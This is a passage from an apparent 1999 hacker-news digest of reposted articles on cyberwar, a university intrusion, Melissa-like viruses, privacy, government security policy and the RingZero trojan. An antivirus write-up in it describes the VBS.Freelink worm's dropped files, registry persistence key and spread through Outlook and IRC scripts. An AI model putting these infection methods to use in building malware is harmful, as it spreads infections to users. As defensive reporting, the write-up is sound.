to its curriculum. In Netwar, governments are often at a disadvantage against rebel groups or terrorists. Since they are hierarchies, governments are digital sitting ducks, easy prey for electronic attacks. Groups like the Zapatistas and Burmese dissidents fighting the military regime in Rangoon, on the other hand, use swarms of loosely organized "hacktivists" to strike at governmental computer networks. The hackers strike, then swiftly disperse into cyberspace. The rebels' electronic battle station is seldom inside the country they are targeting, and tracing it back through the Net can be like trying to find the door in a hall of mirrors. The Zapatistas' first websites, for example, were based in the U.S., while Colombia's Revolutionary Armed Forces (FARC) guerrillas are in Europe, and Serb Net propagandists relied on sympathizers in Eastern Europe during the Kosovo crisis. One of the most novel weapons in the Zapatistas' digital arsenal is the Electronic Disturbance Theater, which operates out of New York City. These Net activists specialize in virtual sit-ins. Using a JavaScript tool called FloodNet, the group organizes thousands of online protesters to invade a Mexican government website with up to 600,000 hits a minute, normally bringing it to a grinding halt. "We're not into blowing people up or hacking sites," says one of the Theater's founders, Ricardo Dominguez. "We just want to create a small force field that will disturb the pace of power." He predicts that soon peasant farmers in Chiapas will be able to protect themselves from assaults by security forces with "wireless video uploads" that can secretly record incidents of police or army brutality and transmit live on the Internet. According to Dominguez, this would enable viewers to circulate the faces and badge numbers of assailants to human rights groups The art of Netwar is rapidly advancing. Cyberwar is "in its early stages," says the U.S. Naval Postgraduate School's Arquilla, "but it's the harbinger of a new kind of warfare." According to Dorothy Denning, a professor of computer science at Georgetown University, the Kosovo conflict was "the first war fought on the Internet." Air strikes targeted television and radio stations controlled by the Serbs, but NATO deliberately spared the four Internet servers in Yugoslavia from its bombardments. The aim was to let Yugoslavs tap into news on the conflict free from Serb censorship. But this ploy backfired. The Yugoslav government seized control of the servers and used them to pour out pro-Serb propaganda. Their aim, nearly successful, was to weaken the resolve of NATO countries. No challenge to NATO's domination of the skies, the Serbs held their own in the Internet trenches. Serb hackers also used the servers and satellite links left intact by NATO to break into government and industry computers belonging to members of the alliance, disrupting services and defacing websites. NATO hackers did the same to Serb sites. Serb computer experts also lobbed "e-mail bombs" at U.S. government facilities, clogging the systems. Digital sabotage is rife in Asia, too. In the week after the results of East Timor's referendum on independence were announced, the Department of Foreign Affairs received hundreds of e-mail "letter bombs" designed to disable government computers. "Without a firewall, [the e-mail] would have contaminated the system," says a source within the department. In Taiwan and China, supporters and opponents of Taiwan's bid for statehood regularly hack into and deface each other's websites. Some Netwar experts concede the limitations of this kind of combat. Jamming governmental websites may be a nuisance to the Mexicans, for example, but it is unlikely to scare the administration into surrendering to the Zapatistas. Nevertheless, argues Georgetown's Denning, "An electronic petition with a million signatures may influence policy more than an attack that disrupts emergency services." Others, like Zapatista activist Dominguez, view cyberwar as a more civilized alternative to blood-and-guts fighting. "I'd much rather see extremists take down an Internet server than go around killing people," he says. For the Zapatistas, fighting a Netwar may have saved them from extermination, winning the rebels widespread international support. Marcos often compares himself to the cartoon character Speedy Gonzalez. Like this quick-witted mouse, Marcos used the Internet to run rings around his bigger foes. His comrades in other countries may well follow his lead. --WITH REPORTING BY JASON TEDJASUKMANA/JAKARTA @HWA 14.0 Another Security Challenge ~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Yazmon The Shanghai Waigaoqiao Free Trade Zone Network Development Co. is offering a whopping $600 (5,000 yuan) to anyone who can defeat the security of its website within the next week. (I hope companies aren't thinking that this sort of thing will actually test anything.) Reuters- (Url outdated) @HWA 15.0 University Shutdown After Attack ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Code Kid Wittenberg University in Columbus OH, had to completely shut down their web and email system after an electronic break in. During the shutdown the school installed various security improvements that make it harder for off-campus students to use the school's e-mail. The alleged attack occurred Sept. 12 and was traced to Australia. Associated Press- via Cleveland Plain Dealer http://www.cleveland.com/news/pdnews/metro/oa17hac.ssf Hackers force college to close Web, e-mail servers Monday, October 18, 1999 By ANDREW WELSH-HUGGINS ASSOCIATED PRESS COLUMBUS - Hackers who invaded Wittenberg University's computers last month forced the institution to shut down its e-mail system and Web site. Their attack also resulted in security improvements that make it harder for off-campus students to use the school's e-mail. University President Baird Tipson said the attack occurred Sept. 12 and was traced to Australia. The hackers also struck at least three other Ohio colleges in the same assault. "The major cost has been enormous amounts of our computing staff time that we desperately needed," Tipson said. "We're all trying to make sure we're Y2K compliant. We believe that we are now, but we wouldn't have taken two or three weeks of their time to spend on this project." Tipson revealed details of the attack as he testified before lawmakers about the need for using part of Ohio's $10.1 billion tobacco settlement to pay for more technology for colleges. Wittenberg, with 2,060 students, is a private liberal arts university in Springfield. Joe Deck, director of computing services at Wittenberg, said the attack occurred just before noon on a Sunday. He said several employees of his department were working on Y2K compliance systems and noticed intruders in the system after about 10 minutes. They immediately shut down the university's Web and e-mail servers and isolated Wittenberg's connection to the Internet. Deck said the hackers' expertise was "very well organized" and said he chose not to let them stay in the system longer, even though that might have increased the chance of identifying the culprits. Since then, university employees have spent at least 2,000 hours rebuilding passwords, improving the software "firewall" that protects the system and putting other security precautions into effect. From users' perspective, things are back to normal, although work on internal systems still needs to be done, Deck said. Deck, Tipson and other officials would not identify the other three Ohio colleges attacked. Tipson said the work Wittenberg did in reaction to the attack cost in the "low six figures." Economics Professor Jeff Ankrom said he uses the Internet extensively in his classes. For about two weeks, "I felt almost immobilized," Ankrom said. "My Web site for classes was frozen in time, and I found myself being locked into the old mode of doing things, making announcements in class, handing out slips of paper, worrying about who got them, who didn't." Wittenberg junior Ethan Grefe said the situation was a serious problem for off-campus students, since they weren't able to access their e-mail for several days. "At first, I think the general atmosphere was one of astonishment, that somebody from Australia came and hacked into our system. It was just kind of weird," said the 20-year-old from Toledo. "As it went on for a couple of weeks, people were getting pretty aggravated." 16.0 More Melissa Strains ~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Code Kid Melissa.U, Melissa.V, and VBS.Freelink are new Melissa strains that are spreading across the internet. While this article doesn't provide any new information it does give some background as to what has been going on in the AV world recently. Yahoo News http://dailynews.yahoo.com/h/zd/19991016/tc/19991016310.html Saturday October 16 03:36 PM EDT Melissa-like viruses haunt firms Robert Lemos, ZDNet Spiritual descendents of the Melissa computer virus have appeared over the last month, haunting at least 10 companies, according to anti-virus firms. Recently, two variants of the Melissa virus -- Melissa.U and Melissa.V -- and VBS.Freelink, a Visual Basic script virus with a Melissa-like MO, have been infecting the unprepared. Just ask Design Continuum Inc., a West Newton, Mass.-based industrial design firm that spent 40 man-hours cleaning up after a recent virus outbreak. Two weeks ago, Tim Cronin, Design Continuum's director of business development, received an e-mail from a client with the subject line "Check this." Without thinking, Cronin opened the attachment, which was infected with VBS.Freelink. "Within 45 minutes, I looked back at my screen and saw 60 messages from outside sources asking what had I done, and my IS (information systems) manager was on the phone asking me what had happened," Cronin told ZDNN in an interview. VBS.Freelink is a relatively benign virus that spreads quickly, but does not damage data. Still, in spreading, the virus can create quite a bit of carnage, said Cronin. By the time he realized what had happened, all 85 of the firm's employees had received the attachment and enough had opened the e-mail that the company's servers quickly filled to overflowing, rejecting incoming messages. "We invested at least a man-week in cleaning it up (over four days)," he said. E-mailed from trusted source Design Continuum -- and its unnamed clients -- had fallen victim to the trick that made Melissa so virulent: its packaging. "I received the original e-mail from a source that I recognized as my client, so I felt trusting enough to open (the attachment)," he said. In fact, the social engineering was so good that, when several recipients' anti-virus software deleted the infected mail, they wrote back to Cronin, asking him to re-send the document. "There is a good bet that I would have been immune as well if I had updated my anti-virus suite," he said. Lull between storms? Design Continuum seems to be in the minority, however. Overall, companies and home users alike seem to have taken to heart the lessons of Melissa: Be suspicious of all attachments and regularly update your anti-virus software. "The shock value of Melissa was good for education," said Chengi "Jimmy" Kuo, director of ant-virus research for security software firm Network Associates Inc. "Corporations are much more attuned to e-mail-based viruses. Anytime they hear about a virus, they want to know about it and get a cure immediately." Anti-virus firm and NAI rival Trend Micro Inc. reported only six companies infected with the Melissa variants in the past week; four others have been hit with Freelink. "We are just in the 'Variations on a Theme' period right now," said Susan Orbuch, director of communications for Trend Micro. The anti-virus firms regard the past few months as a lull between storms. "It takes a while for virus writers to come out with something new," said NAI's Kuo. "Most viruses are by virus writers who have taken the code and tweaked it." While a "tweaked" computer virus may not be identified by anti-virus software due to its different fingerprint, all major anti-virus software also has heuristics to pick out modified viruses. "The recent viruses are nasty (more destructive) than Melissa," said Trend Micro's Orbuch, "but our heuristics are catching them because they are only variants -- they are not new." Luck is a large factor as well. Anti-virus vendors who find out about a virus before it enters the wild can limit any damage and distribute new detection data -- known as "definitions" -- for their software. Yet, while the current crop of code being generated by virus writers is not original, the anti-virus firms are worried that some virus writer will learn how to make a true e-mail virus -- one that does not require the user to act at all. "There are techniques for attacking directly -- without needing the user to open an attachment," said NAI's Kuo. "Such (Melissa-like) viruses are not out of the picture yet." -=- VBS.Freelink Aliases: Freelink, VBS.Freelink Area of Infection: \Windows and \Windows\System folder Likelihood: Common Detected on: July 2, 1999 Characteristics: Trojan Horse, Worm Description VBS.Freelink is a virus discovered in July 1999. Symantec AntiVirus Research Center has recently been receiving an increase in VBS.Freelink virus reports from our customers. To protect yourself from this virus, all Norton AntiVirus customers should ensure their virus definitions are up to date by using the LiveUpdate feature. In order to detect the VBS.Freelink virus, it is necessary to scan files with the VBS filename extension. It is recommended to use the options in NAV to scan "All files" rather than using the "Program Files" option. Please note that this may cause performance issues depending on the software, hardware and configurations you are using. Newer versions of Norton AntiVirus are shipped with scan "All files" as default configurations. If you choose only to scan "Program Files", please make sure that the configurations in Norton AntiVirus includes the "VBS" file extension as well as the following file extensions in the "Scanner" and "AutoProtect" options. Recommended Extension List as of Oct 5, 1999: 386, ADT, BIN, CBT, CLA, COM, CPL, CSC, DLL, DOC, DOT, DRV, EXE, HTM, HTT, JS, MDB, MSO, OV?, POT, PPT, RTF, SCR, SHS, SYS, VBS, XL? Technical Notes VBS.Freelink is an encrypted worm that will work under Windows 98, Windows 2000 and all the other Windows supporting VB Scripting language. Once the worm is launched, it will use MS Outlook to automatically send an email with an attachment of itself. Similar to the Melissa virus, this worm uses MAPI calls to get user profiles from MS Outlook. The contents of the email generated by this worm are: Subject: Check this Have fun with these links. Bye. When the attached file is executed, it will create the following two files: C:\WINDOWS\LINKS.VBS C:\WINDOWS\SYSTEM\RUNDLL.VBS It will also create a file called LINKS.VBS in the root of all network drives that are currently mapped. Next, the worm will modify the following registry to execute every time the machine boots up: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion\Run\Rundll=RUNDLL.VBS After infecting a system, it will displays a dialog box title "Free XXX links" with following content: This will add a shortcut to free XXX links on your desktop. Do you want to continue. If the user selects yes, it will create a shortcut pointing to an adult web site. It also searches for MIRC32.EXE and PIRCH98.EXE chat programs in C:\MIRC , C:\PIRCH98, C:\PROGRAM FILES and the sub directories of each of these directories. If it finds either of these programs, it will modify the corresponding SCRIPT.INI file or EVENTS.INI located in the same directory. These INI files will cause LINKS.VBS to be sent to other people during the IRC sessions. Norton AntiVirus users can protect themselves from this worm by downloading the current virus definitions either through LiveUpdate or from the following webpage: http://www.symantec.com/avcenter/download.html Write-up by: Abid Hussain Oonwala October 5th, 1999 @HWA 17.0 Loyalty Cards are Not As Private As People Think ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by evilwench Just how private is the information gathered by Customer Loyalty Cards? We're talking about those bar-coded cards that give shoppers at supermarkets and other stores up to a 15 percent discount in return for tracking what you buy. Supermarkets say that the data they gather is never sold or divulged to third parties. A search warrant is another matter. If an ex-spouse wants to discover if your a good parent they can subpoena the supermarket records. And no one really knows how secure these databases are. Nando Times http://www.techserver.com/noframes/story/0,2294,500046068-500075236-500169924-0,00.html Privacy concerns leave customers wary of grocery cards Copyright © 1999 Nando Media Copyright © 1999 Scripps Howard News Service From Time to Time: Nando's in-depth look at the 20th century By MARY DEIBEL ARLINGTON, Va. (October 16, 1999 1:43 a.m. EDT http://www.nandotimes.com) - Even though Safeway Club Card member Lois Diehl McDonley doesn't mind others knowing her shopping habits, she has a tip for those who do: Pay separately in cash for purchases you want kept private and use the discount card for the rest. "It's your business if you don't want people knowing if you buy cigarettes, alcohol, certain reading materials or some other item, but those things don't usually get discounts anyway," says McDonley, a 57-year-old medical secretary and mother of two. "Segregating your goods the way you do if you run an errand for a neighbor or need a receipt to be reimbursed at work not only protects your privacy, it messes up Big Brother's data base," she says. But Safeway says it doesn't sell or lease information about individual club card customers. "Privacy has never been an issue," says spokeswoman Karen Darnells from company headquarters in Pleasanton, Calif. "Club card members and their identities are kept strictly confidential" It's the same at other grocery chains that see the bar-coded rewards cards as a weapon in the battle for customer business in the $400-billion-a-year grocery wars: The cards typically carry discounts of 15 percent or more on specified goods in return for customers letting the stores build detailed personal profiles from their purchases. "We have an absolutely strict policy that we do not share that information with any third party," said Kroger spokesman Gary Rhodes. Kroger currently is the top-selling supermarket in the nation. However, Rhodes and spokesmen for other big markets, including No. 2 Albertson's, No. 3 Wal-Mart, No. 4 Safeway and No. 5 Ahold USA agree that information can and will be surrendered to law enforcement authorities armed with a court order. Nob Hill Foods in the San Francisco Bay area and Wild Oats natural food stores out of Boulder, Colo., did away with loyalty cards in response to customer surveys. Privacy experts say there's nothing to keep loyalty card data secret from a subpoena if someone is being sought in a criminal case or caught in a child custody fight. "You may innocently buy junk food, a pregnancy kit or over-the-counter sleeping aids, but how would it look if you decided to run for the school board or mayor 10 years from now?" says Judith DeCew, a Clark University professor and author of "In Pursuit of Privacy: Law, Ethics & the Rise of Technology" (Cornell University Press, 1997. "Whatever promises retailers make, nobody can be sure who has access to their data warehouses, and that goes for all kinds of stores, not just supermarkets," she says. "Internet e-tailers are especially aggressive when collecting data on customers: Look at how Amazon.com targets your book-buying and music interests, and consider that it's setting itself up as a worldwide virtual mall, and remember what was made of Monica Lewinsky's book purchases in the real world." California last week became the first state in the nation to limit the information that grocery stores can require as a condition for signing up for reward cards: A new state law stops stores from requiring would-be club card members to list driver's license or Social Security numbers. The statute also makes it illegal to rent or sell customer names, even though stores say they don't as a matter of policy. "Grocery shoppers will no longer have to risk their privacy to save a few dollars on grocery purchases," California state Sen. Jackie Speier, D-Daly City, says. So far, federal authorities have been slow to safeguard shoppers' privacy. What few steps they've taken include prohibitions on: - Release of video rental lists after Robert Bork's viewing preferences made it into press accounts in the midst of his failed 1987 Supreme Court bid. - Third-party interceptions of cell phone calls, which prompted a fine for a Florida couple who passed on a taped conversation in which Rep. John Boehner, R-Ohio, was overheard plotting strategy with fellow House Republican leaders during an attempted overthrow of then- House Speaker Newt Gingrich of Georgia. - Internet firms collecting personal data from youngsters. Anyone older than 14, however, presumably is old enough to check a Web site's privacy policy or look for labels such as those voluntarily adopted by the On-line Privacy Alliance, to which nearly 100 corporations and associations belong. Another voluntary privacy program is BBBOnLine, which just awarded its 100th privacy seal with more than 400 applications still in the pipeline. BBBOnLine chief operating officer Robert Bodoff says firms that qualify are banking on privacy being good business for them and for their customers and "helping to build confidence in on-line commerce." Marketing expert Martha Rogers of Bowling Green University agrees: "The future of one-to-one marketing in which a customer is willing to sell some privacy in return for letting the retailer buy information about that person's buying preferences depends on building trust," she says. Rogers adds that the relationship may involve getting Americans to "shop in new ways: You can always slide what you don't want anyone to know you're buying into a second shopping cart and forgo the discount." If that advice sounds familiar, it's Lois Diehl McDonley's advice, too, gleaned from years as a supermarket shopper. Take discounts if you want to and skip them where you feel your privacy could be compromised, she says, and, oh yes, "chill out a little" in the bargain. As she sees it, "Some people might be embarrassed, but I can't fathom who'd be remotely interested in the stuff I buy." Mary Deibel is a reporter for Scripps Howard News Service. @HWA 18.0 Interview With the Cult of the Dead Cow ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by evenprime Slashdot is hosting an email interview with the Cult of the Dead Cow. They will be gathering questions until this afternoon and then posting the responses on Friday. The Cult of the Dead Cow http://www.cultdeadcow.com Slashdot http://slashdot.org/interviews/99/10/18/0939245.shtml @HWA 19.0 Amazon.com Hosts Crypto Challenge ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Kiad Arch'August Amazon has posted an interesting challenge for home cryptography buffs. Break their code and win books, Lego Mindstorms, and bragging rights. Amazon.com http://www.amazon.com/exec/obidos/redirect?tag=thehackernewsnet&path=subst/promotions/crypto/crypto-contest.html Crack the Code Do You Have the Skills to Win the Contest? Welcome to Amazon.com's Cryptography Contest, where you can test your decryption skills and win a swell prize package chock full of geek goodies--signed copies of four classic crypto books, and a brain-bending programmable robot kit! You don't need any special math skills to decrypt the messages--just good old-fashioned smarts and a little persistence. Cryptography is the art and science of secret messages. Since people first set stylus to tablet, ciphers and codes have been used to conceal the meaning of written text. Cryptography played a vital role in politics, business, and war throughout history, changing the fortunes of Julius Caesar and Mary Queen of Scots, among others. Why, without cryptography, the Allies might never have won World War II! These days, cryptography is crucial in the everyday workings of our computers, from e-mail encryption to secure financial transactions. Here at Amazon.com, we like to think of cryptography as a good, wholesome activity, providing hours of fun for the whole family. But it's no fun if no one gets the correct answer, so if you're having trouble, check back--we may post some hints to help you get started. Without further ado, may we present the crypto-challenge. Happy solving! 038-097-34-64-242-335-51-377-183-168 038-097-34-64-380-330-115-289-273-189-56 068-486-42-23-87-434-10-468-151-345-150-494-376-415-426 038-549-53-15-1-193-121-29-109-66-28-160-106 047-111-70-99-24-21-25-12-53-22-56-8 --Code created by Alex Yan and Katherine Degelau The Payoff Gee Whiz, Look at All This Keen Stuff! Signed editions of Cryptonomicon, The Code Book, Between Silk and Cyanide, and Applied Cryptography A LEGO® MindstormsTM Robotics Invention System kit A chance to tell the world how you solved the crypto puzzle! How to Enter 1.Send your answer, via e-mail, to crypto-contest@amazon.com. 2.Include the full finished translation of the puzzle, as well as your full name and daytime telephone number. 3.Your entry (one per person, please) must be received by 11:59 pm (PST) Friday, October 29, 1999, or we won't be able to evaluate it. 4.Entries with the correct solution will be entered into a random drawing, from which we will pick the winner. 5.You must be a resident of the U.S. or Canada, excluding Quebec, to participate. @HWA 20.0 Web Sites Cause Crime, Report Says ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Q Bahl Computer Economics, an independent research firm, has released a report blaming underground websites for the proliferation of computer crime. The damage caused by underground websites, they say, is estimated at over 1 Trillion dollars a year world wide. Yahoo News http://biz.yahoo.com/bw/991018/ca_compute_1.html Computer Economics http://www.computereconomics.com Yahoo; Monday October 18, 9:03 am Eastern Time Company Press Release Computer Crime-Abetting Sites Will Dramatically Increase Costs for Businesses and Consumers CARLSBAD, Calif.--(BUSINESS WIRE)--Oct. 18, 1999--Hacking and computer-crime-abetting Web sites are supplying Web surfers with tools and instructions that could cost consumers and businesses worldwide over a trillion dollars this year. Computer Economics research shows that hacking and computer crime will experience a dramatic increase in the next few years due to the abundance of Web sites devoted to these topics. Also factoring into the growth of computer crime is the low cost of the tools and instructions that these sites sell, and the rise of the wireless Internet. ``The Internet has always been a haven for computer criminals,'' said Computer Economics research analyst Adam Harriss. ``The technologically savvy hackers have been online swapping tips and programming for decades, but now the information is being posted and sold at low cost in a form that even the techno-illiterate can understand. Causing damage to machines and infiltrating systems has become as easy as putting together a child's Christmas toy.'' While some hacker sites warn that the products they sell are to be used for informational purposes only, other sites pander to malicious users, and are growing a future generation of hackers by targeting children. The proprietors of some hacking manuals tout them as guides that help users ``search for company secrets.'' Vendors of hacking hardware often boast that their goods ``screw up all types of computer disks.'' Software that could be used to pirate other programs is sometimes said to be ``a must for anyone who doesn't want to pay full price for software.'' Not only are these hacking tools priced very low, but many of the most popular hacking tools, such as L0phtCrack, AntiSniff, nmap, and netcat are free shareware. Manuals and software about hacking and computer crime interests such as viruses, counterfeiting, piracy, and various types of fraud typically run from $8 to $60. The following table shows a few examples of the types of information and technology that is available for order at low prices on the Internet. Computer Crime Instructions and Software Available Online A manual that tells Microsoft users how to avoid the $10 $35 per incident fee for tech support after the 90 days of free support has run out. Software and instructions to circumvent any Internet $30 sites that are restricted by a ``parental block.'' Software to remotely infiltrate the hard drives of $50 people in chat rooms and copy their software. A disk containing over 4000 live viruses including $42 CIA, Michaelangelo, JerusalemB, Dark Avenger, Darth Vader, Kool Aid, AIDS, Rape, Keydrop, Null, and Quiet. -- A guide to making a profit from software bootlegging. $8 Complete guide to hacking a Novell network. Software $25 and texts are included. Instructions about how to break into any Eudora $30 account. The low cost of computer crime software and hardware combined with the dramatic expansion of the Internet into new, lesser-developed regions of the world promises to exacerbate the hacking problem. There are roughly three times as many people using wireless phone services as there are people on the Internet, so there is possibility for an online explosion once a wireless Internet is established. With the expansion and proliferation of the Internet in many countries with loose regulation of computer crime and poorly organized law enforcement, hacking and computer crime will flourish in the years to come. Computer Economics is an independent research firm specializing in helping IT decision makers plan, manage, and control IT costs through advisory services, analyst support, an innovative Web site, and printed reports. Based in Carlsbad, Calif., Computer Economics serves 82 percent of the Fortune 500. For further information, please visit the Web site at http://www.computereconomics.com. Contact: Computer Economics Inc. Catherine Huneke, 760/438-8100, ext. 108 or 116 chuneke@compecon.com http://www.computereconomics.com @HWA 21.0 China to Use Viruses During War ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by William Knowles The People's Liberation Army of China is said to be preparing to fight a 'dirty war'. This includes terrorism, biochemical warfare, environmental damage and computer viruses in an effort to create political and economic crisis. South China Morning Post http://www.scmp.com/News/China/Article/FullText_asp_ArticleID-19991018025207920.asp Monday, October 18, 1999 'PLA has plan to destroy West's finance systems in dirty war' SIMON MACKLIN in London Chinese military strategists have developed plans to destroy Western financial institutions in the event of a major conflict, according to a report in a British newspaper. Senior members of the People's Liberation Army are said to be urging the Government to abandon conventional defence strategies and prepare for a "dirty war". The Sunday Telegraph yesterday said PLA officials were advocating terrorism, biochemical warfare, environmental damage and computer viruses as a means of throwing the West into political and economic crisis. The maverick officers maintained that the mainland must use such tactics because it cannot hope to match the West's military might. Outlines of the plans have been revealed in books and newspaper articles published on the mainland. The blueprints for the dirty war say the PLA should infiltrate and sabotage key pillars of Western society, including banks and the public sector, in a response to a direct threat of war. The officers argue that Beijing's attempts to upgrade its nuclear and conventional arsenal to match America's are insufficient to prepare China for conflict. The increasing global world economy is pinpointed as a weak point which should be exploited, and the PLA officers write admiringly of US financier George Soros, whose attacks on foreign currencies are seen as a template for disrupting an enemy's economic system. One recent article proposed that Beijing should set aside US$100 billion (HK$775 billion) for such measures. A recently published book, Unrestricted War, says China must use every weapon available to make itself equal to more developed countries. Another book by two PLA air force colonels lists 24 types of "dirty war" that could be waged against the US and its allies. Colonel Qiao Liang, the author of a similar book, justified his eccentric advice in a full-page newspaper article published in China. "All strong countries make rules while all rising ones break them and exploit loopholes. Foreigners always rise by breaking the rules of civilised and developed countries, which is what history is all about," he wrote. @HWA 22.0 Call for Public Security Database ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by no0ne At the recent National Information Systems Security Conference speakers called for a publicly accessible database of uncovered modes of attack. The conference sponsored by the Commerce Department's National Institute of Standards and Technology (NIST) and the National Security Agency was attended by military and intelligence people and industry executives from all over the world in an effort to bond together against what they call "united attackers". (A public database is sure better than what numerous other agencies are proposing.) San Jose Mercury News http://www.mercurycenter.com/business/top/067614.htm Posted at 10:09 p.m. PDT Monday, October 18, 1999 Tech firms urged to unite against computer vandals BY DAVID L. WILSON Mercury News Washington Bureau ARLINGTON, VA. -- The people who make it their business to protect secure computer systems from illicit penetration by outsiders agreed Monday they have something important to learn from the villains: pooling information. By sharing information with each other, computer vandals gain an enormous advantage over those who try to thwart them, according to experts at a high-level conference on computer security here Monday. They cited an urgent need to overcome a penchant for secrecy and do a better job sharing resources. ``By sharing we gain a tremendous amount, and by not sharing we're not keeping any secrets,'' argued Matt Bishop, an associate professor of computer science at the University of California-Davis and a prominent authority on computer security. The National Information Systems Security Conference -- sponsored by the Commerce Department's National Institute of Standards and Technology (NIST) and the National Security Agency -- brought industry executives together with military and intelligence researchers from around the world to strategize on the battle against ``the intruder community.'' Wily ``crackers'' -- the black hats of the game -- break into computers systems to steal valuable information, eavesdrop and otherwise humiliate their prey, or simply engage in vandalism by erasing all the data on a supposedly secure hard drive. Others in this cyberspace demimonde -- call them white hats or ``hackers'' -- also test the security of computer systems, but with a benign intent: Their sport is to discover vulnerability and help plug holes. Members of both groups routinely exchange information via the Internet, with the black hats using the information to write ``tool kits,'' or software that will automatically attack vulnerable computers. The white hats, meanwhile, use this information to alert computer system administrators of flaws in their security that must be repaired, and try to pressure commercial software developers to issue software ``patches'' to fix the holes. In this environment, systems administrators can be quickly overwhelmed, said Peter Mell, a scientist with NIST's computer security division. The information used by the attackers is fragmented and diffuse and cannot be verified easily. Members of the intruder community typically don't hold down conventional jobs and can devote long hours to planning a security breach. Large organizations can try to fend off such guerrilla tactics, Mell told the audience, `but it is so expensive to get this information, understand it and use it.'' ```An attacker only has to find one way into your system,'' said Andrew Balinski, a security research engineer for networking giant Cisco Systems. ``A defender has to defend against all attacks.'' Mell, Balinski and Bishop urged those at the conference to work toward pooling information they've uncovered on intruders' various modus operandi to create a publicly accessible databases. Such an effort would make computer security much more practical and effective for everyone, they said. Cooperating on a common defense may have its drawbacks, however, the speakers acknowledged. An open public database might offer one-stop shopping for information vandals. And some security professional would fear compromising their competitive advantage by sharing information. Yet the defenders desperately need a system that can make it more cost effective to stay current on security threats, the experts argued. A good first step would be to develop a common framework to let researchers quickly classify attacks using standard descriptions. But even that won't be easy to accomplish. ``The attackers share a common goal,'' said Bishop, the UC Davis professor. ``We don't.'' @HWA 23.0 GAO Calls for Security Laws ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Code Kid With NIPC, CIAO, NIST, and even the Office of Management and Budget all legally tasked to define security standards for various government agencies the Government Accounting Office feels it is time for Congress to step in and pass some laws. The GAO is recommending that laws be passed to help direct these various security efforts to eliminate duplication and overlapping. Federal Computer Week http://www.fcw.com/pubs/fcw/1999/1018/fcw-pollaw-10-18-99.html OCTOBER 18, 1999 GAO: IT security law needed Law would help direct disparate security policies BY DIANE FRANK (diane_frank@fcw.com) Agencies have improved the security of many information systems, but the lack of clearly defined roles among agencies coordinating security has hindered federal security experts' ability to protect systems from intrusion, according to the General Accounting Office. Agencies have spent the past two years plugging security holes in computer systems, but it has been such an ad hoc effort that federal security managers have been left without any coordinated guidance on developing a fully secure government, GAO officials told the Senate Judiciary Technology, Terrorism and Government Information Subcommittee this month. To help pull together agencies' efforts, GAO recommended that Congress should consider passing legislation that would better define how lead organizations should work together and how agencies should follow their direction. "It's not so much that there needs to be one central organization in charge as the need for defining where each organization fits," said Jean Boltz, assistant director of governmentwide and defense information systems within GAO's Accounting and Information Management Division (AIMD). "I think this is an area where legislation should definitely be considered." Until recently, the authority to oversee computer security resided in two organizations. The Paperwork Reduction Act of 1995 gave security oversight authority to the Office of Management and Budget, while the Computer Security Act of 1987 gave authority to the National Institute of Standards and Technology. But last year, President Clinton issued Presidential Decision Directive 63, requiring agencies to protect their critical information systems from cyberattacks. While PDD 63 helped focus federal attention on growing information security threats, it also created several new groups, including the National Infrastructure Protection Center at the FBI and the Critical Infrastructure Assurance Office (CIAO) at the National Security Council. The organizations' overlapping -- and in some cases conflicting -- responsibilities has led to duplicate efforts, such as developing governmentwide instead of agency-specific best-practices guidelines, which has confused agencies, according to GAO executives. "While these organizations have developed fundamentally sound policies and guidance and have undertaken potentially useful initiatives, effective improvements are not taking place," said Jack Brock, director of the AIMD office, testified before the subcommittee this month. Some of the problems stem from the fact that the NIPC and the CIAO, formed in 1998, and the CIO Council, formed in 1997, are relatively new, and any new process or organization will need to iron out kinks, Brock said. Still, some basic security issues must be solved soon, he said. "It is unclear how the activities of these many organizations interrelate, who should be held accountable for their success or failure and whether they will effectively and efficiently support national goals," Brock said. For agencies that are developing their own security plans under PDD 63 while complying with OMB regulations, it can be especially confusing getting guidance from so many places, Boltz said. And the fact that some organizations' power is prescribed by law while others are given by PDD 63 or other executive orders leaves agencies wondering which orders are going. Some legislative changes are under way in Congress. The House Science Technology Subcommittee is working on the Computer Security Enhancement Act, a bill that would update NIST's role in the governmentwide security landscape. Others, including the Senate Government Affairs Committee, also have expressed interest in the issue of legislation. "There's a lot of interest and a lot of people looking at it right now," Boltz said. "It's really coming to fruition." @HWA 24.0 RingZero Still on the Loose ~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by toka25 HNN first mentioned this virus last week but now more information is available. RingZero was designed to search the internet for proxy servers. RingZero has been labeled a "quantum leap in distributed attack technology" by researchers. CMP TechWeb http://www.techweb.com/wire/story/TWB19991013S0018 Experts Fear Trojan Proxy Server Virus (10/13/99, 7:05 p.m. ET) By Lee Kimber, TechWeb Security experts are trying to track down the perpetrators of a huge Internet surveillance operation that they say could presage an attack on websites around the world. Members of the Bethesda, Md.-based System Administration, Networking, and Security (SANS) Institute have already identified over 200 copies of a Trojan virus called RingZero that scans Web proxy servers and relays its findings back to remote computers across the Internet. That means information, including credit card numbers, and other private transaction information could be stolen. Since SANS warned its 64,000 members to check for the Trojan after the first was discovered two weeks ago, its researchers have slowly pieced together frightening evidence of a systematic attempt to gather information from commercial proxy servers. Proxy servers are widely used by business to handle Web access on office networks. They host intranet websites, let administrators restrict the websites staff may visit and cut bandwidth costs. Once installed on a network, RingZero's pst.exe file randomly scans for proxy servers and makes them send their own Internet address and port number to what appears to be a data collection script running on a machine at www.rusftpsearch.net. Crackers use IP addresses and port numbers as a starting point for breaking into computers. "It's a quantum leap in distributed attack 